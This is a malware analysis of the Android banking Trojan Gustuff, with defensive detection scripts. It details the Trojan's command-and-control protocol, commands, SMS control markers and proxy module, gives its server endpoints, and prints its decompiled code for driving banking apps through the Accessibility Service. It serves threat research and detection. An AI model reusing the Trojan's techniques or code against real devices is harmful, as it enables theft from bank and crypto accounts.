How the Android Trojan Gustuff skims the cream (fiat and crypto) off your accounts


Just the other day, Group-IB reported on the activity of the mobile Android Trojan Gustuff. It operates exclusively in international markets, attacking customers of the 100 largest foreign banks, users of 32 mobile crypto wallets, and large e-commerce resources. Yet the developer of Gustuff is a Russian-speaking cybercriminal using the nickname Bestoffer. Until recently he advertised his Trojan as "a serious product for people with knowledge and experience."

Ivan Pisarev, malware analysis specialist at Group-IB, describes in detail in his research how Gustuff works and what makes it dangerous.

Who is Gustuff hunting?

Gustuff belongs to a new generation of malware with fully automated functions. According to the developer, the Trojan is a new, improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. Bestoffer reported that the rental price of Gustuff Bot is $800 per month.

Analysis of the Gustuff sample showed that the Trojan can potentially target customers who use the mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JP Morgan, Wells Fargo, Capital One, TD Bank and PNC Bank, as well as crypto wallets: Bitcoin Wallet, BitPay, Cryptopay, Coinbase, etc.

Originally created as a classic banking Trojan, in its current version Gustuff has significantly expanded its list of potential targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers. In particular: PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Entry point: calculating the time for mass infection

Gustuff uses the "classic" vector of penetrating Android smartphones: SMS mailings with links to an APK. When an Android device is infected with the Trojan, on command from the server Gustuff can spread further through the contact database of the infected phone or through the server's database. Gustuff's functionality is designed for mass infection and for maximum capitalization of its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which allows the theft of money to be accelerated and scaled.

The study of the Trojan showed that the autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass protection against interaction with the window elements of other applications using this Android service. However, the use of the Accessibility Service in combination with autofill is still quite rare.

After being loaded onto the victim's phone, Gustuff, using the Accessibility Service, gains the ability to interact with the window elements of other applications (banking, cryptocurrency, online shopping, messaging, etc.), performing the actions the attackers need. For example, on command from the server, the Trojan can press buttons and change the values of text fields in banking applications. Using the Accessibility Service mechanism allows the Trojan to bypass the security mechanisms banks use against the previous generation of mobile Trojans, as well as the security policy changes Google introduced in new versions of the Android OS. Thus, Gustuff "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications with the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window downloaded from the server, into which they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened. In this case the malware, on command from the server and via the Accessibility Service, can fill in the fields of the banking application for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, the ability to read and send SMS messages, send USSD requests, launch a SOCKS5 Proxy, follow links, send files (including photo scans of documents, screenshots and photos) to the server, and reset the device to factory settings.

Malware analysis

Before installing the malicious application, the Android OS shows the user a window with the list of permissions requested by Gustuff:

The application is installed only after the user's consent. After the application is launched, the Trojan shows the user a window:

After which it removes its icon.

Gustuff is packed, according to its author, with the packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we examined used the IP address 88.99.171[.]105 as the control server (hereinafter we denote it as <%CnC%>).

After launch, the application starts sending messages to the server at http://<%CnC%>/api/v1/get.php.

A JSON response of the following form is expected:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Each time the application receives a command, it sends information about the infected device. The format of this information is shown below. Note that the fields full, extra, apps and permission are optional and are sent only if the corresponding request flag has been enabled from the CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores important working information in a preference file. The name of the file, as well as the names of the parameters in it, are the result of computing an MD5 sum of the string 15413090667214.6.1<name>, where name is the original (plaintext) name. A Python interpretation of the name generation function:

import hashlib
def nameGenerator(input):
    output = hashlib.md5(("15413090667214.6.1" + input).encode()).hexdigest()  # MD5 of the fixed prefix plus the original name
    return output

Hereinafter we denote it as nameGenerator(input).
Thus the preference file is named nameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Variable name                             Value
nameGenerator("API_SERVER_LIST")          Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL")           Contains the CnC address.
nameGenerator("SMS_UPLOAD")               Flag is set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER")          Phone number to which SMS messages received by the infected device are forwarded. Default is null.
nameGenerator("SMS_ROOT_NUMBER_RESEND")   Flag is cleared by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS")          Flag is cleared by default. If this flag is set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN")            Flag is cleared by default. If the flag is set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY")    Flag is cleared by default. If the flag is set, the service that uses the Accessibility Service is running.
nameGenerator("APPS_CONFIG")              A JSON object with the list of actions to perform when an Accessibility event associated with a specific application is triggered.
nameGenerator("APPS_INSTALLED")           Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN")              Flag is reset on first launch.
nameGenerator("UNIQUE_ID")                Contains a unique identifier. Generated when the bot is launched for the first time.
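For an analyst who has pulled the preferences file off an infected device, the useful direction is the reverse one: turning the MD5-obfuscated key names back into the parameter names above. The following script is an added example written for this article, not code from the Gustuff sample or from Group-IB; it recomputes nameGenerator for the names the table lists, builds a reverse lookup, and labels the entries of a constructed SharedPreferences-style XML fragment. The ".xml" suffix on the file name follows the usual Android SharedPreferences layout and is an assumption, as is the sample XML content.

```python
import hashlib
import xml.etree.ElementTree as ET

# Fixed prefix the article gives for the preference-name derivation.
NAME_PREFIX = "15413090667214.6.1"

# Parameter names listed in the article's table (IS_FIST_RUN spelled as the sample spells it).
KNOWN_NAMES = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED", "IS_FIST_RUN",
    "UNIQUE_ID",
]


def name_generator(name: str) -> str:
    """MD5 hex digest of prefix + name, i.e. the article's nameGenerator()."""
    return hashlib.md5((NAME_PREFIX + name).encode("utf-8")).hexdigest()


def build_lookup(names=KNOWN_NAMES) -> dict:
    """Map each obfuscated key back to its plaintext parameter name."""
    return {name_generator(n): n for n in names}


def preference_file_name() -> str:
    """The article says the preference file is named nameGenerator("API_SERVER_LIST").
    Assumption: Android stores SharedPreferences as <name>.xml under shared_prefs/."""
    return name_generator("API_SERVER_LIST") + ".xml"


def labelled_entries(xml_text: str) -> dict:
    """Parse a SharedPreferences XML body and label every entry whose key we recognise.
    Unknown keys are kept, marked as such, so nothing recovered from the device is dropped."""
    root = ET.fromstring(xml_text)
    lookup = build_lookup()
    out = {}
    for el in root:
        key = el.get("name")
        value = el.get("value", el.text)          # <boolean value="..."/> vs <string>text</string>
        out[lookup.get(key, "<unknown:" + key + ">")] = value
    return out


# Constructed sample (not from the page) of what a recovered preferences file might hold.
SAMPLE_PREFS_XML = """<map>
    <string name="%s">aGVsbG8=</string>
    <boolean name="%s" value="true" />
    <boolean name="%s" value="false" />
    <string name="deadbeef">unrelated</string>
</map>""" % (name_generator("API_SERVER_URL"),
             name_generator("SMS_UPLOAD"),
             name_generator("DEFAULT_ACCESSIBILITY"))

if __name__ == "__main__":
    print("preference file:", preference_file_name())
    for label, value in labelled_entries(SAMPLE_PREFS_XML).items():
        print("%-40s %s" % (label, value))
```

Because the prefix is a constant embedded in the sample, the same lookup table works for every Gustuff build that shares it; a sample using a different prefix will simply yield all-unknown keys, which is itself a hint that the build differs from the one described here.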

Module for processing commands from the server

The application stores the CnC server addresses as an array of Base85-encoded strings. The list of CnC servers can be changed upon receipt of the corresponding command, in which case the addresses are saved to the preference file.

In response to the request, the server sends a command to the application. Note that commands and parameters are presented in JSON form. The application can process the following commands:

Command              Description
forwardStart         Start sending SMS messages received by the infected device to the CnC server.
forwardStop          Stop sending SMS messages received by the infected device to the CnC server.
ussdRun              Execute a USSD request. The number for the USSD request is in the JSON field "number".
sendSms              Send one SMS message (splitting it into parts if necessary). As a parameter, the command takes a JSON object with the fields "to" (the destination number) and "body" (the message body).
sendSmsAb            Send an SMS message (split into parts if necessary) to everyone in the infected device's contact list. The interval between sends is 10 seconds. The message body is in the JSON field "body".
sendSmsMass          Send an SMS message (split into parts if necessary) to the contacts specified in the command parameters. The interval between sends is 10 seconds. As a parameter, the command takes a JSON array (field "sms") whose elements contain the fields "to" (destination number) and "body" (message body).
changeServer         This command can take as a parameter a value under the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). Thus the application changes the address of the CnC server.
adminNumber          The command is intended for working with the root number. It accepts a JSON object with the parameters: "number" (change nameGenerator("ROOT_NUMBER") to the received value), "resend" (change nameGenerator("SMS_ROOT_NUMBER_RESEND")), "sendId" (send the unique ID to nameGenerator("ROOT_NUMBER")).
updateInfo           Send information about the infected device to the server.
wipeData             The command is intended for deleting user data. Depending on the name under which the application was launched, either the data is wiped completely with a device reboot (primary user) or only the user data is deleted (secondary user).
socksStart           Launch the Proxy module. The module's operation is described in a separate section.
socksStop            Stop the Proxy module.
openLink             Follow a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open the link.
uploadAllSms         Send all SMS messages received by the device to the server.
uploadAllPhotos      Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile           Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers   Send phone numbers from the contact list to the server. If a JSON object with the key "ab" arrives as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" arrives, the application reads the contact list from the senders of SMS messages.
changeArchive        The application downloads a file from the address that comes as a parameter under the key "url". The downloaded file is saved under the name "archive.zip". The application then unpacks the file, using the archive password "b5jXh37gxgHBrZhQ4j3D" if necessary. The unpacked files are saved to the directory [external storage]/hgps. In this directory the application stores web fakes (described below).
actions              The command is intended for working with the Action Service, which is described in a separate section.
test                 Does nothing.
download             The command is intended for downloading a file from a remote server and saving it to the "Downloads" directory. The URL and file name come as parameters, as fields of the JSON parameter object: "url" and "FileAme" respectively.
remove               Deletes a file in the "Downloads" directory. The file name comes in the JSON parameter under the key "FileAme". The default file name is "tmp.apk".
notification         Show a notification with the description and title text specified by the control server.

Notification command format:

{
    "results" : "OK",
    "command":{
        "id": <%id%>,
        "command":"notification",
        "timestamp":<%Server Timestamp%>,
        "params":{
            "openApp":<%Open original app or not%>,
            "array":[
                {"title":<%Title text%>,
                 "desc":<%Description text%>,
                 "app":<%Application name%>}
            ]
        },
    },
}

The notification generated by the file under study is made to look like a notification from the application specified in the app field. If the value of the openApp field is True, then when the notification is opened the application specified in the app field is launched. If the value of the openApp field is False, then:

  • a phishing window opens whose content is loaded from the /hgps/ directory
  • a phishing window opens whose content is loaded from the server at ?id=&app=
  • a phishing window opens disguised as a Google Play card, with the option to enter card details.

The application sends the result of executing any command to set_state.php as a JSON object of the following form:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

Action Service
The list of commands processed by the application includes actions. When such a command is received, the command processing module calls this service to execute the extended command. The service accepts a JSON object as a parameter. The service can execute the following commands:

1. PARAMS_ACTION - upon receiving such a command, the service first obtains from the JSON parameter the value of the Type key, which can be one of the following:

  • notification - the subcommand obtains from the JSON parameter the value of an optional key. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag for the service that uses the Accessibility Service. In this way the service is started in a separate process.
  • root - obtain information about the currently focused window and send it to the server. The application obtains the information using the AccessibilityNodeInfo class.
  • admin - request administrator rights.
  • delay - suspend the Action Service for the number of milliseconds specified in the parameter under the key "data".
  • windows - send the list of windows visible to the user.
  • install - install an application on the infected device. The name of the package archive is in the key "FileAme". The archive itself is located in the Downloads directory.
  • global - a subcommand intended for navigating away from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to notifications
    • to the recently opened applications window

  • launch - launch an application. The application name comes as a parameter under the key data.
  • sound - switch the sound mode to silent.
  • unlock - turn on the screen and keyboard backlight at full brightness. The application does this using a WakeLock, specifying the string [Application Label]:INFO as the tag.
  • permissionOverlay - function not implemented (the response to the command is {"message":"not supported"} or {"message":"low sdk"}).
  • gesture - function not implemented (the response to the command is {"message":"not supported"} or {"message":"low API"}).
  • permissions - this command is meant to request permissions for the application. However, the request function is not implemented, so the command has no effect. The list of requested permissions comes as a JSON array under the key "permissions". Standard list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - show a phishing window. Depending on the parameter coming from the server, the application can show the following phishing windows:
    • A phishing window whose content is stored in a file in the /hgps/ directory. The result of the user's interaction with the window is sent to /records.php
    • A phishing window whose content is loaded from the address ?id=&app=. The result of the user's interaction with the window is sent to /records.php
    • A phishing window disguised as a Google Play card.

  • interactive - the command is intended for interacting with the window elements of other applications using the AccessibilityService. A special service is implemented in the program for this interaction. The application under study can interact with windows that are:
    • Currently active. In this case the parameter contains the id or text (name) of the element to interact with.
    • Visible to the user at the moment the command is executed. The application selects windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameters, can perform the following actions:

    • focus - set focus on the element.
    • click - click the element.
    • actionId - perform an action by ID.
    • setText - change the element's text. Changing the text is possible in two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is LOLLIPOP or newer), or by placing the string on the clipboard and pasting it into the element (for older versions). This command can be used to change data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that a JSON array of commands arrives.

Many readers will probably be interested in what the function for interacting with another application's window looks like. This is how that functionality is implemented in Gustuff (decompiled):

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);   // how many times to apply the action to each node
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;                             // number of actions that succeeded
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {      // ACTION_FOCUS
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {     // ACTION_CLICK
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addProperty("res", Integer.valueOf(count));   // result reported back to the server
    return count > 0;
}

Text substitution function:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Thus, with a correctly configured control server, Gustuff can fill in the text fields of a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send a command to display a PUSH notification and then open the previously installed banking application. The user authenticates themselves, after which Gustuff can perform the autofill.

SMS message processing module

The application installs an event handler for SMS messages received by the infected device. The application under study can receive commands from the operator that arrive in the body of an SMS message. Commands come in the form:

7!5=

The application searches all incoming SMS messages for the string 7!5=. When the string is found, it decodes the string from Base64 starting at offset 4 and executes the command. The commands are similar to those from the CnC. The result of execution is sent to the same number the command came from. Response format:

7*5=

Optionally, the application can forward all received messages to the root number. For this, the root number must be specified in the preference file and the message redirection flag must be set. The SMS message is sent to the attacker's number in the form:

-

Also optionally, the application can send messages to the CnC. The SMS message is sent to the server in JSON form:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the incoming message list.
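The SMS channel above is the one a responder is most likely to see evidence of outside the device, in carrier or MDM message logs, so a triage routine for it is worth having. The script below is an added example written for this article, not code from the sample or from Group-IB: it looks for the 7!5= command marker and the 7*5= reply marker the text describes, Base64-decodes whatever follows the command marker from offset 4, and reports which command name the decoded JSON carries. Assumptions: the payload is standard Base64 (possibly unpadded), and the reply after 7*5= is not decoded. The sample messages are constructed; the encoded one carries the "test" command, which the table above says does nothing.

```python
import base64
import binascii
import json

# Markers the article gives: "7!5=" prefixes an operator command carried in an SMS body,
# "7*5=" prefixes the bot's reply SMS.
COMMAND_MARKER = "7!5="
RESPONSE_MARKER = "7*5="
MARKER_LEN = 4   # the article says decoding starts at offset 4, i.e. right after the marker


def decode_sms_command(body: str):
    """Return the decoded command text that follows 7!5=, or None if absent or undecodable.
    Assumption: standard Base64; missing padding is tolerated, junk characters are not."""
    pos = body.find(COMMAND_MARKER)
    if pos < 0:
        return None
    payload = body[pos + MARKER_LEN:].strip()
    try:
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4), validate=True)
        return raw.decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def classify_sms(body: str):
    """Label an SMS body as 'command', 'response' or None, plus the decoded command if any."""
    if COMMAND_MARKER in body:
        return "command", decode_sms_command(body)
    if RESPONSE_MARKER in body:
        return "response", None
    return None, None


def triage(messages):
    """Return (index, kind, command_name) for every message carrying a Gustuff marker.
    A marker that is present but not decodable is still reported (command_name None)."""
    hits = []
    for i, body in enumerate(messages):
        kind, decoded = classify_sms(body)
        if kind is None:
            continue
        name = None
        if decoded:
            try:
                name = json.loads(decoded).get("command")
            except (json.JSONDecodeError, AttributeError):
                name = None
        hits.append((i, kind, name))
    return hits


# Constructed sample messages (not from the page).
SAMPLE_MESSAGES = [
    "Your parcel is waiting, see http://example.invalid/track",
    COMMAND_MARKER + base64.b64encode(b'{"command":"test","params":{}}').decode(),
    RESPONSE_MARKER + "ok",
    "7!5=!!!not base64!!!",
]

if __name__ == "__main__":
    for idx, kind, name in triage(SAMPLE_MESSAGES):
        print("message %d: %s%s" % (idx, kind, "" if name is None else " (" + name + ")"))
```

Reporting the undecodable marker hit rather than dropping it matters in practice: an operator who changes the encoding keeps the marker, and the marker alone is enough to tell an SMS-control channel from ordinary spam.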

Proxy module

The application under study contains a Backconnect Proxy module (hereinafter the Proxy module), implemented as a separate class with static fields holding its configuration. The configuration data is stored in the sample in the clear:


All actions performed by the Proxy module are logged to files. For this, the application creates a directory named "logs" in External Storage (the ProxyConfigClass.logsDir field of the configuration class), in which the log files are kept. Logging is done to files with the following names:

  1. main.txt - the work of the class named CommandServer is logged to this file. Hereinafter, logging the string str to this file is denoted as mainLog(str).
  2. session-.txt - this file stores log data associated with a specific proxy session. Hereinafter, logging the string str to this file is denoted as sessionLog(str).
  3. server.txt - this file is used to log all data written to the files described above.

Log data format:

[Thread[], id[]]: log-string

Exceptions thrown during the operation of the Proxy module are also logged to a file. For this, the application forms a JSON object of the form:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It is then converted to its string representation and logged.

The Proxy module is launched after the corresponding command is received. Upon receiving the command to launch the Proxy module, the application starts a service called MainService, which is responsible for managing the Proxy module: starting and stopping it.

Service startup stages:

1. Starts a timer that fires once a minute and checks whether the Proxy module is active. If the module is not active, it starts it.
The Proxy module is also launched when the android.net.conn.CONNECTIVITY_CHANGE event fires.

2. The application creates a wake lock with the PARTIAL_WAKE_LOCK parameter and acquires it. This prevents the device's CPU from entering sleep mode.

3. Starts the Proxy module's command processing class, first logging the line mainLog("starting server") and

Server::start() host[], commandPort[], proxyPort[]

where proxy_cnc, command_port and proxy_port are parameters obtained from the proxy server configuration.

The command processing class is called CommandConnection. Immediately after launch it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends data about the infected device there in JSON form:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id – identifier; the module tries to read the value of the "id" field from the Shared Preferences file named "x". If this value cannot be obtained, it generates a new one. Thus the Proxy module has its own identifier, generated in the same way as the Bot ID.
  • imei - the device IMEI. If an error occurs while obtaining the value, an error text message is written instead of this field.
  • imsi - the device's International Mobile Subscriber Identity. If an error occurs while obtaining the value, an error text message is written instead of this field.
  • model - the end-user-visible name of the end product.
  • manufacturer - the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion - a string of the form " (),"
  • country - the current device location.
  • partnerId - an empty string.
  • packageName - the package name.
  • networkType - the current network connection type (for example "WIFI", "MOBILE"). On error, null is returned.
  • hasGsmSupport – true if the phone supports GSM, otherwise false.
  • simReady – the SIM card state.
  • simCountry - ISO country code (based on the SIM card provider).
  • networkOperator - the operator name. If an error occurs while obtaining the value, an error text message is written instead of this field.
  • simOperator - the Service Provider Name (SPN). If an error occurs while obtaining the value, an error text message is written instead of this field.
  • version - this field is stored in the configuration class; for the bot versions tested it was "1.6".

5. Switches to waiting for commands from the server. Commands from the server come in the form:

  • offset 0 - command
  • offset 1 – sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs:
mainLog("header { sessionId[], type[], length[] }")

The following commands from the server are possible:

Name           command   data            Description
connectionId   0         connection ID   Create a new connection
SLEEP          3         time            Suspend the Proxy module
PING_PONG      4         -               Send a PONG message

The PONG message consists of 4 bytes and looks like this: 0x04000000.
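The frame layout in step 5 (command at offset 0, sessionId at offset 1, length at offset 2, data from offset 4) is enough to write a decoder for captured command-channel traffic, which is what an IDS signature or a sandbox's traffic parser needs. The following script is an added example written for this article, not code from the sample or from Group-IB. It assumes the command and sessionId are single bytes and the length is a 16-bit big-endian integer; that layout is consistent with the 4-byte PONG 0x04000000 the text gives (command 4, session 0, length 0), but the byte order of the length field is an assumption. The sample byte stream is constructed, and the last frame in it is deliberately truncated to show how a partial read is handled.

```python
import struct

# Command codes from the article's table.
COMMANDS = {0: "connectionId", 3: "SLEEP", 4: "PING_PONG"}
PONG = b"\x04\x00\x00\x00"   # the 4-byte PONG the article gives as 0x04000000
HEADER_LEN = 4


def parse_frame(buf: bytes):
    """Parse one frame laid out as offset 0 command, 1 sessionId, 2 length, 4 data.
    Returns (name, session_id, data, rest) or None if the buffer does not yet hold a
    complete frame (caller should read more bytes and retry)."""
    if len(buf) < HEADER_LEN:
        return None
    cmd, session, length = struct.unpack(">BBH", buf[:HEADER_LEN])   # assumption: big-endian length
    if len(buf) < HEADER_LEN + length:
        return None
    data = buf[HEADER_LEN:HEADER_LEN + length]
    name = COMMANDS.get(cmd, "unknown(%d)" % cmd)
    return name, session, data, buf[HEADER_LEN + length:]


def parse_stream(buf: bytes):
    """Split a captured byte stream into frames; stops at the first incomplete frame and
    returns it as the leftover so the caller can prepend it to the next read."""
    frames = []
    while True:
        parsed = parse_frame(buf)
        if parsed is None:
            break
        name, session, data, buf = parsed
        frames.append((name, session, data))
    return frames, buf


def header_log_line(name, session, length):
    """The mainLog header line the article describes, with its placeholders filled in."""
    return "header { sessionId[%d], type[%s], length[%d] }" % (session, name, length)


# Constructed capture (not from the page): a PING_PONG, a connectionId carrying a 2-byte
# payload, a SLEEP carrying a 4-byte payload, then a frame cut off after its header.
SAMPLE_STREAM = (PONG
                 + b"\x00\x07\x00\x02\xab\xcd"
                 + b"\x03\x01\x00\x04\x00\x00\x0e\x10"
                 + b"\x00\x09\x00\x10\xaa")

if __name__ == "__main__":
    frames, leftover = parse_stream(SAMPLE_STREAM)
    for name, session, data in frames:
        print(header_log_line(name, session, len(data)), data.hex())
    print("leftover bytes awaiting more data:", leftover.hex())
```

Keeping the leftover bytes rather than discarding them is the detail that makes this usable on a live socket or a pcap reassembled stream, where frame boundaries never line up with read boundaries.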

Upon receiving the connectionId command (to create a new connection), CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in proxying: ProxyConnection and end. When a ProxyConnection is created, it connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes the JSON object:

 {
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which the connection is to be established. Interaction with that server is carried out through the end class. The connection setup can be represented schematically as follows:

[diagram: connection setup scheme]

Network interaction

To prevent traffic analysis by network sniffers, the interaction between the CnC server and the application can be protected with the SSL protocol. All data transmitted to and from the server is presented in JSON form. During operation the application performs the following requests:

  • http://<%CnC%>/api/v1/set_state.php - the result of command execution.
  • http://<%CnC%>/api/v1/get.php - receiving commands.
  • http://<%CnC%>/api/v1/load_sms.php - uploading SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - uploading the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - requested when parameters in the preference file are updated.
  • http://<%CnC%>/api/v1/set_card.php - uploading data obtained through the phishing window that imitates the Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - uploading log data.
  • http://<%CnC%>/api/v1/records.php - uploading data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php – reporting an error that occurred.
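The endpoint list is a ready-made network signature: the /api/v1/*.php paths are distinctive, and the control server IP given earlier in the article (88.99.171[.]105) can be matched alongside them. The script below is an added example written for this article, not code from the sample or from Group-IB; it scans constructed proxy-log lines for those paths and that IP, and reports each hit with the purpose the article assigns to the endpoint. The log line format (client, method, URL, status) is an assumption for the sample; the regex only needs the URL to appear somewhere on the line.

```python
import re

# Endpoints from the article's list, with what each request carries.
GUSTUFF_ENDPOINTS = {
    "set_state.php": "command execution result",
    "get.php": "command retrieval",
    "load_sms.php": "SMS upload",
    "load_ab.php": "contact list upload",
    "aevents.php": "preference update notice",
    "set_card.php": "card data from the fake Google Play window",
    "logs.php": "log upload",
    "records.php": "phishing window data",
    "set_error.php": "error report",
}

# Control server IP reported in the article (defanged there as 88.99.171[.]105).
CNC_IP = "88.99.171.105"

ENDPOINT_RE = re.compile(
    r"/api/v1/(%s)(?:\?|$|\s)" % "|".join(re.escape(e) for e in GUSTUFF_ENDPOINTS)
)


def classify_request(url: str):
    """Return (endpoint, purpose) if the URL hits a known Gustuff CnC path, else None."""
    m = ENDPOINT_RE.search(url)
    if m is None:
        return None
    return m.group(1), GUSTUFF_ENDPOINTS[m.group(1)]


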